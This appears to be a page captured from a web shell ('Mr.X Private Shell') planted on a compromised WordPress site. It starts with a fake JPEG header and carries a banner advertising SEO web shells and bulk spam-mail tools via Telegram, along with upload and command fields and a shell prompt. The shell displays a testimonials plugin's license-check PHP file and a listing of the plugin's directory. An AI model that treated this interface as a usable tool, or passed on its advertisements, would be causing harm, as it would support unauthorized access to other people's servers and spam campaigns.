����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<?php
include("etkg.php");
include_once( ABSPATH . 'wp-admin/includes/plugin.php' ); // so we have access to is_plugin_active()

function isValidKey(){
	
	// look for active Easy T Pro license key (with 2 day buffer)
	$option_key = '_easy-testimonials-pro/easy-testimonials-pro.php_license_info';
	$license = get_option($option_key);
	if ( !empty($license) 
		 && !empty($license['expires']) 
		 && $license['expires'] > strtotime('-2 days') ) {
		return true;
	}
	
	// look for pro plugin
	$pro_plugin_path = "easy-testimonials-pro/easy-testimonials-pro.php";
	if ( is_plugin_active($pro_plugin_path) ) {
		return true;
	}
	
	global $gp_etkg_memo;
	if ( empty($gp_etkg_memo) )
	{
		$email = get_option('easy_t_registered_name');
		$webaddress = get_option('easy_t_registered_url');
		$key = get_option('easy_t_registered_key');
		
		$keygen = new ETKG();
		$computedKey = $keygen->computeKey($webaddress, $email);
		$computedKeyEJ = $keygen->computeKeyEJ($email);

		if ($key == $computedKey || $key == $computedKeyEJ) {
			$gp_etkg_memo = true;
		} else {
			$plugin = "easy-testimonials-pro/easy-testimonials-pro.php";
			
			include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
			
			if(is_plugin_active($plugin) && class_exists('easyTestimonialsPro') ){
				$gp_etkg_memo = true;
			}
			else {
				$gp_etkg_memo = false;
			}
		}
	}
	return $gp_etkg_memo;
}

function isValidMSKey(){
	$plugin = "easy-testimonials-pro/easy-testimonials-pro.php";
	
	include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
	
	if(is_plugin_active($plugin) && class_exists('easyTestimonialsPro') ){
		return true;
	}
	else {
		return false;
	}
}
?>

Filemanager

Name Type Size Permission Actions
BikeShed Folder 0755
GP_Aloha Folder 0755
GP_Fake_Data_Generator Folder 0755
GP_Janus Folder 0755
GP_Media_Button Folder 0755
GP_Sajak Folder 0755
GP_SmartTextAvatars Folder 0755
easy_testimonials_custom_columns.php File 6.54 KB 0644
error_log File 759 B 0644
etkg.php File 1.31 KB 0644
gp-recaptcha.class.php File 4.81 KB 0644
gp-testimonial.class.php File 38.87 KB 0644
ik-custom-post-type.php File 15.83 KB 0644
lib.php File 1.66 KB 0644